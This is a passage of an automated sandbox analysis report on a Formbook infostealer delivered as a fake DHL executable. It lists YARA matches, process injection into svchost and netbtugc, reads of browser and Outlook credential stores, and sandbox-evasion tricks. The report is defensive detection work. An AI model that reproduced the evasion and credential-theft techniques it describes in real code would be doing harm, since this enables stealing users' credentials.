            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FF43F2_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039314602_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FB802_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B5BF02_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397DBF92_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFB762_2_039FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DDAAC2_2_039DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03985AA02_2_03985AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E1AA32_2_039E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EDAC62_2_039EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFA492_2_039FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7A462_2_039F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B3A6C2_2_039B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D59102_2_039D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039499502_2_03949950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395B9502_2_0395B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039438E02_2_039438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AD8002_2_039AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03941F922_2_03941F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFFB12_2_039FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFF092_2_039FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03949EB02_2_03949EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395FDC02_2_0395FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F1D5A2_2_039F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03943D402_2_03943D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F7D732_2_039F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FFCF22_2_039FFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B9C322_2_039B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0392B970 appears 278 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03975130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 039BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03987E54 appears 102 times
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: String function: 00840A30 appears 46 times
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: String function: 00829CB3 appears 31 times
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: String function: 0083F9F2 appears 40 times
            Source: DHL 0737-12182024.exe, 00000000.00000003.2069436154.00000000034F3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 0737-12182024.exe
            Source: DHL 0737-12182024.exe, 00000000.00000003.2070295685.000000000369D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 0737-12182024.exe
            Source: DHL 0737-12182024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4523238196.0000000002C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4524618858.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2226323346.0000000003710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.4526783594.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2225605698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4524568253.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4524627388.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2227031882.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@18/7
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008937B5 GetLastError,FormatMessageW,0_2_008937B5
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008810BF AdjustTokenPrivileges,CloseHandle,0_2_008810BF
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008816C3
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_008951CD
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008AA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_008AA67C
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0089648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0089648E
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008242A2
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeFile created: C:\Users\user\AppData\Local\Temp\aut1CC0.tmpJump to behavior
            Source: DHL 0737-12182024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000003.2407308495.0000000002E50000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002E71000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002E7B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002E9E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2407308495.0000000002E71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL 0737-12182024.exeReversingLabs: Detection: 57%
            Source: unknownProcess created: C:\Users\user\Desktop\DHL 0737-12182024.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 0737-12182024.exe"Jump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL 0737-12182024.exeStatic file information: File size 1254400 > 1048576
            Source: DHL 0737-12182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 0737-12182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 0737-12182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 0737-12182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 0737-12182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 0737-12182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DHL 0737-12182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MPhqOtiHUlL.exe, 00000003.00000002.4524073743.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp, MPhqOtiHUlL.exe, 00000006.00000000.2293045863.0000000000DCE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 0737-12182024.exe, 00000000.00000003.2072424792.0000000003570000.00000004.00001000.00020000.00000000.sdmp, DHL 0737-12182024.exe, 00000000.00000003.2073603863.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2129558471.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226481868.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128074509.0000000003500000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2225656804.000000000315B000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2228176846.000000000330F000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4524933921.000000000365E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4525505296.0000000003AEC000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4523547041.0000000002DEE000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000006.00000002.4524926192.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2513390369.00000000213FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2191743013.000000000321A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2226000633.0000000003200000.00000004.00000020.00020000.00000000.sdmp, MPhqOtiHUlL.exe, 00000003.00000002.4523724213.0000000000868000.00000004.00000020.00020000.00000000.sdmp
            Source: DHL 0737-12182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 0737-12182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 0737-12182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 0737-12182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 0737-12182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008242DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008242DE
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_00840A76 push ecx; ret 0_2_00840A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004048A9 push esp; ret 2_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E2BA push 00000038h; iretd 2_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A436 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418C92 pushad ; retf 2_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A5D9 push ebx; iretd 2_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017E5 push ebp; retf 003Fh2_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403780 push eax; ret 2_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004147A2 push es; iretd 2_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD push ecx; mov dword ptr [esp], ecx2_2_039309B6
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_0083F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_0083F98E
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeCode function: 0_2_008B1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_008B1C41
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97581
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeAPI/Special instruction interceptor: Address: B64EB4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E rdtsc 2_2_0397096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 9797Jump to behavior
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exeAPI coverage: 3.8 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep count: 175 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep time: -350000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep count: 9797 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 2924Thread sleep time: -19594000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\umeNdySDdvdekbBjvsFCGOcUZgbEDfrSVyColahOtoqffWkTCaAJeFNKqtZzCrf\MPhqOtiHUlL.exe TID: 6768Thread sleep time: -65000s >= -30000sJump to behavior
